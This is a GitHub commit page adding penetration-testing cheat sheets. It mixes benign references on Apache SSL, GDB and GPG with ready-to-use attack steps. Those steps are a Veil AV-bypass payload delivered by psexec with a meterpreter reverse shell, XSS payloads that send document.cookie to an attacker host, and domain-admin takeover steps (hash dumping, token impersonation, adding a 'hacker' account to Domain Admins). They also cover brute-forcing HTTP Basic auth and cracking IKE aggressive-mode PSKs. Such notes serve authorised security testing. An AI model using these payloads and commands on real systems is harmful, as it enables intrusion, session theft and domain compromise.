Skip to content

Commit

Permalink
Cheatsheets
Browse files Browse the repository at this point in the history
Added more cheatsheets
  • Loading branch information
1nPr0c committed Sep 11, 2014
1 parent 0204cf3 commit 95f0350
Show file tree
Hide file tree
Showing 19 changed files with 953 additions and 15 deletions.
14 changes: 14 additions & 0 deletions Cheatsheet_AVBypass.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1,14 @@
1. Generate executable using Veil.

2. In msfconsole setup psexec with relevant payload (windows/meterpreter/reverse_tcp)

msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST 192.168.0.2
RHOST => 192.168.0.2
msf exploit(psexec) > set SMBUser user
SMBUser => user
msf exploit(psexec) > set SMBPass pass
SMBPass => pass
msf exploit(psexec) > set EXE::Custom /root/Desktop/Misc/Veil-master/payload.exe
EXE::Custom => /root/Desktop/Misc/Veil-master/payload.exe
msf exploit(psexec) > exploit
42 changes: 42 additions & 0 deletions Cheatsheet_ApacheSSL.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1,42 @@
# Enabling Self signed certificates on local website

1. Install OpenSSL

2. Run the following command to generate the self signed SSL certificates:

openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout mysitename.key -out mysitename.crt

3. You will be prompted to enter your organizational information and a common name. The common name should be the fully qualified domain name for the site you are securing (www.mydomain.com). You can leave the email address, challenge password, and optional company name blank. When the command is finished running, it will create two files: a mysitename.key file and a mysitename.crt self signed certificate file valid for 365 days.

4. Install the self signed certificate:

Make a backup copy of /etc/apache2/sites-enabled/000-default and open the original in a text editor.

Add the lines in bold below. <VirtualHost 192.168.0.1:443>
DocumentRoot /var/www/website
ServerName www.domain.com
SSLEngine on
SSLCertificateFile /etc/ssl/certs/primary.crt
SSLCertificateKeyFile /etc/ssl/certs/private.key
SSLCertificateChainFile /etc/ssl/certs/intermediate.crt
</VirtualHost>

Change the names of the files and paths to match your certificate files. Save the changes and exit the text editor.

5. Enable mod_ssl under apache using the following commands:

a2enmod ssl
/etc/init.d/apache2 restart

## Add ServerName localhost

to /etc/apache2/apache2.conf


More information:
https://www.sslshopper.com/article-how-to-create-and-install-an-apache-self-signed-certificate.html
http://www.akadia.com/services/ssh_test_certificate.html
https://www.sslshopper.com/apache-server-ssl-installation-instructions.html
http://www.emreakkas.com/linux-tips/invalid-command-sslengine-enabling-ssl-on-ubuntu-server


12 changes: 12 additions & 0 deletions Cheatsheet_CookieStealing.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1,12 @@
[+] Cookie Stealing:

[-] Start Web Service

python -m SimpleHTTPServer 80

[-] Use one of the following XSS payloads:

<script>document.location="http://192.168.0.60/?c="+document.cookie;</script>
<script>new Image().src="http://192.168.0.60/index.php?c="+document.cookie;</script>


30 changes: 30 additions & 0 deletions Cheatsheet_DomainAdminExploitation.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1,30 @@
[+] After compromising a Windows machine:

[>] List the domain administrators:
From Shell - net group "Domain Admins" /domain

[>] Dump the hashes (Metasploit)
msf > run post/windows/gather/smart_hashdump GETSYSTEM=FALSE

[>] Find the admins (Metasploit)
spool /tmp/enumdomainusers.txt
msf > use auxiliary/scanner/smb/smb_enumusers_domain
msf > set smbuser Administrator
msf > set smbpass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
msf > set rhosts 10.10.10.0/24
msf > set threads 8
msf > run

msf> spool off

[>] Compromise Admin's box
meterpreter > load incognito
meterpreter > list_tokens -u
meterpreter > impersonate_token MYDOM\\adaministrator
meterpreter > getuid
meterpreter > shell

C:\> whoami
mydom\adaministrator
C:\> net user hacker /add /domain
C:\> net group "Domain Admins" hacker /add /domain
58 changes: 58 additions & 0 deletions Cheatsheet_GDB.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1,58 @@
set disassembly-flavor intel

$ cat ~/.bash_aliases | grep gdb
alias gdb='gdb -quiet'

Running gdb
------------------
$ gdb - run, then use file command to load object
$ gdb -quiet - supress copyright information
$ gdb object - normal debug
$ gdb object core - analyze core dump
$ gdb object pid - attach to running process

General commands
------------------
set args - set program arguments
show args - show program arguments
run - run the program
run < file - run with input from file
set follow-exec-mode new/sam - set debugger response to an exec call
set write - set write into executables
set write off - unset write int oexecutables
continue - continue running until break
finish - execute until current stack frame ends
source FILE - read commands from script file
shell [cmd] - run cmd in a shell
display /5i $eip - display expression everytime execution stops
undisplay <expr #> - undisplay expression number
info functions - list all the functions
info variables - list all the variables
info registers - list most common registers
info all-registers - list all registers
info display - print the list of displayed expressions
backtrace - print backtrace of all stack frames
where - same as backtrace
set disassembly-flavor intel - set disassembly style to intel/att
define hook-[cmd] - actions to execute before command
define hooopost-[cmd] - actions to execute after command
define hook-stop - actions to execute when execution stops

Breakpoints
------------------
info breakpoints - list all breakpoints
break [func] - break function name
break *[addr] - break at address
delete [bnum] - delete breakpoint bnum
break if [cond] - break if condition
ignore [bnum] [count] - ignore breakpoint bnum count times
condition [bnum] $eax == 0x22 - add condition for breakpoint 1
condition [bnum] - delete condition for breakpoint 1

Watchpoints
------------------
info watchpoints - list all the watchpoint
watch variable==value - break when variable equals ..
watch $eax == 0x0000ffaa - break when register equals ..
rwatch *[addr] - break on read memory location
awatch *[addr] - break on read/write memory location
14 changes: 14 additions & 0 deletions Cheatsheet_GPG.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1,14 @@
Encrypt
------------
sudo gpg -e ~/Desktop/file.doc

This will prompt you to type in the persons name (public key) to encrypt with.

Decrypt
-----------
sudo gpg -d ~/Desktop/file.doc.pgp > ~/Desktop/file.doc


Import other users' public keys by using:

sudo gpg --import <key>
40 changes: 40 additions & 0 deletions Cheatsheet_HTTPBasicAuth.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1,40 @@
[>] HTTP Basic Authentication Dictionary and Brute-force attacks with Burp Suite

http://www.dailysecurity.net/2013/03/22/http-basic-authentication-dictionary-and-brute-force-attacks-with-burp-suite/

Burp Suite against HTTP Basic authentication

To implement the attack you need to capture one authentication request with Burp Proxy and send it to Burp Intruder.

Mark only the Base64 encoded string and click Add button to put the markers around it.

Dictionary attack

For the dictionary attack I’m using custom iterator intruder option. It allows you to generate your own custom payload string consisting from several substrings. For every substring you could specify separator which is basically e suffix. The Intruder calls those substrings “positions”.
Following this logic in position 1 we would like to load an username followed by separator semicolumn and then load password for position 2.
Go to Payload tab and select Custom iterator option from Payload type dropdown box.
Burp Suite Custom Iterator
Select position 1 from the Position dropdown box and load your usernames list in List items for position 1 listbox. Put semicolumn in the Separator for position 1 text box.
Position 1 list and separator option
Select position 2 from the Position dropdown box and load your passwords list in List items for position 2 listbox.
Position 2
After you’ve set your two positions you need to tell the Intruder to encode the payload string using Base64 encoding. Go to Payload processing sections and click Add button. Select Payload encoding option and then Base64.
PayloadProcessin_AddRule_Encode
PayloadProcessingEncode
By default Burp Intruder URL encodes the payload. Base64 strings often contain = symbol. That is why it is a good idea to exclude it from the list of URL characters for encoding.
That’s it. You can start the Intruder attack.

Bruteforce attack

The method I’m using for the bruteforce attack is targeting only one username per Intruder attack.
Select Brute forcer from the Payload type dropdown and then set the length of the password and the characterset you would like the Intruder to use while constructing the password strings.
Burp Intruder Brute forcer
In order to specify the username you would like to brute-force you need to set Payload processing rule. Add new rule with Add prefix type and fill up the username followed by semi-column.
Burp Intruder Add Prefix
Add another rule to encode the payload using Base64. And finally remove = from the list of symbols subject of URL encoding.
Burp Sutei Bruteforce Attack Settings
Done! You can start the Intruder attack!

[>] Automated Security Analyser for ASP.NET Websites

https://asafaweb.com
60 changes: 60 additions & 0 deletions Cheatsheet_IKEScan_.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1,60 @@
Aggressive Mode VPN -- IKE-Scan, PSK-Crack

In IKE Aggressive mode the authentication hash based on a preshared key (PSK) is transmitted as response to the initial packet of a vpn client that wants to establish an IPSec Tunnel (Hash_R). This hash is not encrypted. It's possible to capture these packets using a sniffer, for example tcpdump and start dictionary or brute force attack against this hash to recover the PSK.

This attack only works in IKE aggressive mode because in IKE Main Mode the hash is already encrypted. Based on such facts IKE aggressive mode is not very secure.

It looks like this:

$ ike-scan 192.168.207.134
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)

192.168.207.134 Notify message 14 (NO-PROPOSAL-CHOSEN) HDR=(CKY-R=f320d682d5c73797)
Ending ike-scan 1.9: 1 hosts scanned in 0.096 seconds (10.37 hosts/sec).
0 returned handshake; 1 returned notify

----------------------------------------------------------------------------------------------------------------------------------

$ sudo ike-scan -A 192.168.207.134
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ikescan/)

192.168.207.134 Aggressive Mode Handshake returned HDR=(CKY-R=f320d6XXXXXXXX) SA=(Enc=3DES Hash=MD5 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) VID=12f5f28cXXXXXXXXXXXXXXX (Cisco Unity) VID=afcad71368a1XXXXXXXXXXXXXXX(Dead Peer Detection v1.0) VID=06e7719XXXXXXXXXXXXXXXXXXXXXX VID=090026XXXXXXXXXX (XAUTH) KeyExchange(128 bytes) ID(Type=ID_IPV4_ADDR, Value=192.168.207.134) Nonce(20 bytes) Hash(16 bytes)

----------------------------------------------------------------------------------------------------------------------------------

To save with some output:

$ sudo ike-scan -A 192.168.207.134 --id=myid -P192-168-207-134key

Once you have you psk file to crack you're stuck with two options psk-crack and cain

----------------------------------------------------------------------------------------------------------------------------------

Brute force:

$psk-crack -b 5 192-168-207-134key
Running in brute-force cracking mode
Brute force with 36 chars up to length 5 will take up to 60466176 iterations

no match found for MD5 hash 5c178d[SNIP]
Ending psk-crack: 60466176 iterations in 138.019 seconds (438099.56 iterations/sec)

Default is charset is "0123456789abcdefghijklmnopqrstuvwxyz" can be changed with --charset=

$ psk-crack -b 5 --charset="01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134key
Running in brute-force cracking modde
Brute force with 63 chars up to length 5 will take up to 992436543 iterations

----------------------------------------------------------------------------------------------------------------------------------

Dictionary attack:

$psk-crack -d /path/to/dictionary 192-168-207-134key
Running in dictionary cracking mode

no match found for MD5 hash 5c178d[SNIP]
Ending psk-crack: 14344876 iterations in 33.400 seconds (429483.14 iterations/sec)

----------------------------------------------------------------------------------------------------------------------------------

References: http://carnal0wnage.attackresearch.com/2011/12/aggressive-mode-vpn-ike-scan-psk-crack.html
Loading

0 comments on commit 95f0350

Please sign in to comment.